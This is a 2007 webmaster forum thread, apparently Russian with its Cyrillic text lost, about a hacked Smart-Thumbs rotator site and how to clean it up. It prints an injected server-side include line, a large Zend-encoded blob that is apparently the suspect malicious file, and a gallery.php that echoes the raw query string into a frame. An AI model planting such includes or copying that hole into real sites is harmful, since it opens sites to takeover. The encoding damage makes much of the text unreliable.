Master-X
|
|
|
»
»
CJs
»
:
Smart-Thumbs ?
26/09/07 17:42
X-dream
<!--#include virtual="/st/db_structure.php"-->
db_structure.php 15 .
? )
: X-dream (
01/10/07 20:55
), 3 ()
26/09/07 17:44
usanatol
26/09/07 17:47
X-dream
:
Zend 2003120701 1 2326 8227 x
2Zˏ:x S/=(F69m9j+G֦NT %JK["e}\cs-^zCڢ)ھtaQ˜#?5Qm@T?_4uM *1/
f
}4r葧g8cn;iM~
T(ț1w`Ó
loLCcc)@STY}\
iHEI4#3לb*}T(AUA^}bDuA`EޝZSzL˜1!U='z0ZU MUk,V$ e&c
PF@C@tpj/
Qj2TdϞR:jxue]ꖄG˽ .9yӯx2rGᇵ+qux"/IHOv/%QЯҽ{c2cs>y0c?B1º_uEY=*CT$ww ]
ʥQs>w{?\e\e.2{UbGht(A zQqg̡\e> a`1{T*A՛2pvv:|ƛ2u|7l$'vڻN˜MW$W D(D(L9)̺
{C^4P](Bx,ԚԷ|ȏ!\>%"'6NL`;܅jBx2)YPnrx4e˜i1;* HaG;m.R5fJQ5U5ff8rߗU,T,fˊ
wUvZ
UAKbOR^(LE9-ji
PZa0jdKbi\4&vXRV,M2<I^ P YR(
_ɓfEGJE5E24IR/Y~Q7뢣e͋b
p" 'L lmrK?w fK9=$}?8u >/UP䳵0GX8DtA^}z{n=O{f8%˜-y WG嫯dQqCm% u~Wko pk- ~/N1!x<@\+ }v_" K
ݗ,<,}yݗls~e.D'\0ޙd{ GX4HKi ,
-ױ7+pmǸAtFevpû_]#0U0~W"-5%4$""sLxƁ1ت
q\$m9kԮWםl6'tا4MjO9jӋS3ڏV\ݙ.ng½˜\sqӲ-zA/Ůo>]#jOkVRcm?6iV%z
(~% g&>HVuZPhBfӅQI>qd+q7Cw'¥
}J4Ņs~Nlc荹34wZb j#jBsݩs1-GNh9xI}b$^Z_lS|u|5ߪuռHT}pؿ:5l9B-χQ-<2pjoT䀅?8 M13
I̪!.M l4%hJ0h
SosJGQNm˜H棶9OMO'J䵈j\v
iԣyЂT$kHI4,ܽp03b}L\M7WkW@L.`-rd ($Qigޱ{7VN`TIɔ$ _1`ɈݎPȟ?f;Hf,=~a.e'diԐ<<JY+A,1] ^: $ZHPZ3{)YFYl,#Ջ,-
~ kLc#lsG2kP9w9w;Mr"$g1Mf7;+$BG`Q"#RF\QIHP()2_Cǜe' ϒʋ6'K5$}"Ì:
E Ϟ_Ld˜o?'˜,?@w1M$z}Mu"IX(:uRMKPu A"m>
26/09/07 17:56
usanatol
???
... -
26/09/07 18:03
X-dream
5.68 .
26/09/07 18:07
shamit
..
26/09/07 18:44
Diablo
st/admin/rotator.php?action=tools&action_submenu=filecheck&domain_id=1
=)
26/09/07 18:48
Diablo
,
.
gallery.php - =\ 15 - .
gallery.php - unknown file
:
<?
$g = getenv ("QUERY_STRING");
?>
<html>
<head>
<title></title>
<!-- frames -->
<frameset rows="100,*">
<frame name="" src="top.html" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
<frame name="" src="<?php echo $g; ?>" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
</frameset>
</head>
</body>
</html>
26/09/07 18:52
Diablo
%)
if you do not use "st/gallery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)
=)
26/09/07 19:40
Danilax
gallery.php ,
"# if you do not use "st/admin/galery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)"
X-dream
?
2. Check admin login/pass under settings>users and remove unknown admin users. If you have access over phpmyadmin, you can display all users from database by running "SELECT * FROM st_users;" query and delete unknown entries from there (because some entries may not be visible from st admin)
3. Check st/admin/.htpasswd file for logins which are unknown for you
4. Check for suspicious files over tools>file check and remove them.
5. Change FTP/SSH and MYSQL logins for all databases on attacked server
6. Enhance your security by following these instructions these instructions
http://www.thumbsrotator.com/help/manual.php?action=help&cmd=help_list&value
[pid]=149
01/10/07 20:56
X-dream
<!--# ="//_."-->
...
... ... ... .